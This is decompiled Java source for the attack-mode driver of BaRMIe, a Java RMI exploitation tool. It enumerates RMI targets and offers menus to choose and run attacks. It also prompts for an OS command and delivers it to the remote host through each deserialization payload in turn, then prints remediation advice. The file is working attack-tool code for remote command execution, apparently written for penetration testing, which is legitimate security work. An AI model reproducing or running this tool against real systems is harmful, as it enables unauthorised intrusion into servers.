/*
 * Decompiled with CFR 0.152.
 */
package nb.barmie.modes.attack;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.ArrayList;
import nb.barmie.exceptions.BaRMIeException;
import nb.barmie.modes.attack.DeserPayload;
import nb.barmie.modes.attack.DeserPayloadFactory;
import nb.barmie.modes.attack.RMIAttack;
import nb.barmie.modes.attack.RMIAttackFactory;
import nb.barmie.modes.attack.RMIDeserAttack;
import nb.barmie.modes.attack.RMITargetData;
import nb.barmie.modes.enumeration.RMIEnumerator;
import nb.barmie.net.TCPEndpoint;
import nb.barmie.util.ProgramOptions;

public class AttackMode {
    private final ProgramOptions _opts;
    private final BufferedReader _in;

    public AttackMode(ProgramOptions options) {
        this._opts = options;
        this._in = new BufferedReader(new InputStreamReader(System.in));
    }

    public void run() {
        RMIAttackFactory.setProgramOptions(this._opts);
        ArrayList<RMITargetData> targets = new ArrayList<RMITargetData>();
        ArrayList<RMITargetData> vulnTargets = new ArrayList<RMITargetData>();
        RMIEnumerator rmie = new RMIEnumerator(this._opts);
        System.out.println("Enumerating " + this._opts.getTargets().size() + " target(s)...");
        for (TCPEndpoint t : this._opts.getTargets()) {
            RMITargetData td = new RMITargetData(rmie.enumerateEndpoint(t));
            targets.add(td);
            if (!td.hasSupportedAttacks()) continue;
            vulnTargets.add(td);
        }
        RMIAttackFactory.cleanUp();
        System.out.println("");
        System.out.println("Target summary:");
        for (RMITargetData target : targets) {
            System.out.println("  " + target.getEndpoint().getEndpoint());
            if (target.hasSupportedAttacks()) {
                System.out.println("    Available attacks:");
                for (RMIAttack a : target.getAttacks()) {
                    System.out.println("      " + a.getReliabilityIndicator() + " " + a.getDescription());
                }
                if (!target.hasDeserializationAttacks() || !target.hasAffectedLibs()) continue;
                System.out.println("    Available deserialization payloads:");
                for (DeserPayload p : target.getDeserPayloads()) {
                    System.out.println("      [+] " + p.getDescription());
                }
                continue;
            }
            System.out.println("    No available attacks for this endpoint.");
        }
        System.out.println("");
        if (vulnTargets.size() > 0) {
            this.targetMenu(vulnTargets);
        } else {
            System.out.println("No vulnerable targets identified.");
        }
    }

    private void targetMenu(ArrayList<RMITargetData> targets) {
        String input = "";
        while (!input.equalsIgnoreCase("q")) {
            int i;
            System.out.println("Target selection");
            for (i = 0; i < targets.size(); ++i) {
                RMITargetData target = targets.get(i);
                System.out.println(" " + (i + 1) + ") " + target.getDetailString());
            }
            System.out.print("Select a target to attack (q to quit): ");
            input = "";
            try {
                input = this._in.readLine();
            }
            catch (IOException ioe) {
                System.out.println("[-] An IOException occurred whilst attempting to read user input.");
                continue;
            }
            try {
                i = Integer.parseInt(input);
                if (i > 0 && i <= targets.size()) {
                    System.out.println("");
                    input = this.attackMenu(targets.get(i - 1));
                    if (!input.equalsIgnoreCase("b")) continue;
                    System.out.println("");
                    input = "";
                    continue;
                }
                System.out.println("[-] Invalid target number.");
            }
            catch (NumberFormatException nfe) {
                if (input.equalsIgnoreCase("q")) continue;
                System.out.println("[-] Invalid menu selection.");
            }
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private String attackMenu(RMITargetData target) {
        String input = "";
        while (!input.equalsIgnoreCase("q") && !input.equalsIgnoreCase("b")) {
            RMIAttack attack;
            int i;
            System.out.println("Available attacks for target: " + target.getEndpoint().getEndpoint());
            for (i = 0; i < target.getAttacks().size(); ++i) {
                attack = target.getAttacks().get(i);
                System.out.println(" " + (i + 1) + ") " + attack.getReliabilityIndicator() + " " + attack.getDescription());
            }
            System.out.print("Select an attack to execute (b to back up, q to quit): ");
            input = "";
            try {
                input = this._in.readLine();
            }
            catch (IOException ioe) {
                System.out.println("[-] An IOException occurred whilst attempting to read user input.");
                continue;
            }
            try {
                i = Integer.parseInt(input);
                if (i > 0 && i <= target.getAttacks().size()) {
                    System.out.println("");
                    attack = target.getAttacks().get(i - 1);
                    if (!attack.isDeserAttack()) {
                        try {
                            System.out.println(attack.getDetailedDescription() + "\n");
                            attack.executeAttack(target.getEndpoint());
                            continue;
                        }
                        catch (BaRMIeException bex) {
                            System.out.println("[-] An exception occurred whilst attacking the target.");
                            System.out.println("    " + bex);
                            continue;
                        }
                        finally {
                            attack.cleanUp();
                            System.out.println("\nRemediation advice (if attack was successful):");
                            System.out.println("  " + attack.getRemediationAdvice() + "\n");
                            continue;
                        }
                    }
                    input = this.deserPayloadMenu(target, attack);
                    if (!input.equalsIgnoreCase("b")) continue;
                    System.out.println("");
                    input = "";
                    continue;
                }
                System.out.println("[-] Invalid attack number.");
            }
            catch (NumberFormatException nfe) {
                if (input.equalsIgnoreCase("q") || input.equalsIgnoreCase("b")) continue;
                System.out.println("[-] Invalid menu selection.");
            }
        }
        return input;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private String deserPayloadMenu(RMITargetData target, RMIAttack attack) {
        String input = "";
        ArrayList<DeserPayload> supportedPayloads = target.getDeserPayloads();
        ArrayList<DeserPayload> allPayloads = new ArrayList<DeserPayload>();
        for (DeserPayload p : supportedPayloads) {
            allPayloads.add(p);
        }
        for (DeserPayload p : DeserPayloadFactory.getAllPayloads()) {
            if (supportedPayloads.contains(p)) continue;
            allPayloads.add(p);
        }
        while (!input.equalsIgnoreCase("q") && !input.equalsIgnoreCase("b")) {
            int i;
            System.out.println("Attack: " + attack.getDescription() + " " + attack.getReliabilityIndicator() + "\n");
            System.out.println(attack.getDetailedDescription() + "\n");
            System.out.println("Deserialization payloads for: " + target.getEndpoint().getEndpoint());
            for (i = 0; i < allPayloads.size(); ++i) {
                DeserPayload payload = (DeserPayload)allPayloads.get(i);
                if (supportedPayloads.contains(payload)) {
                    System.out.println(" " + (i + 1) + ") * " + payload.getDescription());
                    continue;
                }
                System.out.println(" " + (i + 1) + ") " + payload.getDescription());
            }
            System.out.println(" a) Try all available deserialization payloads");
            System.out.print("Select a payload to use (b to back up, q to quit): ");
            input = "";
            try {
                input = this._in.readLine();
            }
            catch (IOException ioe) {
                System.out.println("[-] An IOException occurred whilst attempting to read user input.");
                continue;
            }
            try {
                i = Integer.parseInt(input);
                if (i > 0 && i <= allPayloads.size()) {
                    try {
                        System.out.println("");
                        ((RMIDeserAttack)attack).executeAttack(target.getEndpoint(), allPayloads.get(i - 1));
                        continue;
                    }
                    catch (BaRMIeException bex) {
                        System.out.println("[-] An exception occurred whilst attacking the target.");
                        System.out.println("    " + bex);
                        continue;
                    }
                    finally {
                        attack.cleanUp();
                        System.out.println("\nRemediation advice (if attack was successful):");
                        System.out.println("  " + attack.getRemediationAdvice());
                        System.out.println("  " + allPayloads.get(i - 1).getRemediationAdvice() + "\n");
                        continue;
                    }
                }
                System.out.println("[-] Invalid payload number.");
            }
            catch (NumberFormatException nfe) {
                if (input.equalsIgnoreCase("a")) {
                    System.out.println("");
                    this.attemptAllDeserPayloads(target, attack, allPayloads);
                    continue;
                }
                if (input.equalsIgnoreCase("b") || input.equalsIgnoreCase("q")) continue;
                System.out.println("[-] Invalid menu selection.");
            }
        }
        return input;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void attemptAllDeserPayloads(RMITargetData target, RMIAttack attack, ArrayList<DeserPayload> payloads) {
        String input = "";
        String cmd = "";
        int ctr = 0;
        System.out.print("Enter an OS command to execute: ");
        try {
            cmd = this._in.readLine();
        }
        catch (IOException iOException) {
            // empty catch block
        }
        System.out.println("\nTrying all deserialization payloads.");
        for (DeserPayload p : payloads) {
            System.out.println("[~] Trying: " + p.getName());
            try {
                ((RMIDeserAttack)attack).executeAttack(target.getEndpoint(), p, cmd);
            }
            catch (BaRMIeException bex) {
                System.out.println("[-] An exception occurred whilst attacking the target.");
                System.out.println("    " + bex);
            }
            finally {
                attack.cleanUp();
                System.out.println("\nRemediation advice (if attack was successful):");
                System.out.println("  " + attack.getRemediationAdvice());
                System.out.println("  " + p.getRemediationAdvice() + "\n");
            }
            if (!input.equalsIgnoreCase("a") && ++ctr < payloads.size()) {
                input = " ";
                while (!(input.equals("") || input.equalsIgnoreCase("y") || input.equalsIgnoreCase("n") || input.equalsIgnoreCase("a"))) {
                    System.out.print("[+] Payload delivered, continue trying payloads? [Y]es, [N]o, [A]ll (Y): ");
                    try {
                        input = this._in.readLine();
                    }
                    catch (IOException ioe) {
                        System.out.println("[-] An IOException occurred whilst attempting to read user input.");
                    }
                }
                if (input.equalsIgnoreCase("n")) {
                    return;
                }
            }
            System.out.println("");
        }
    }
}

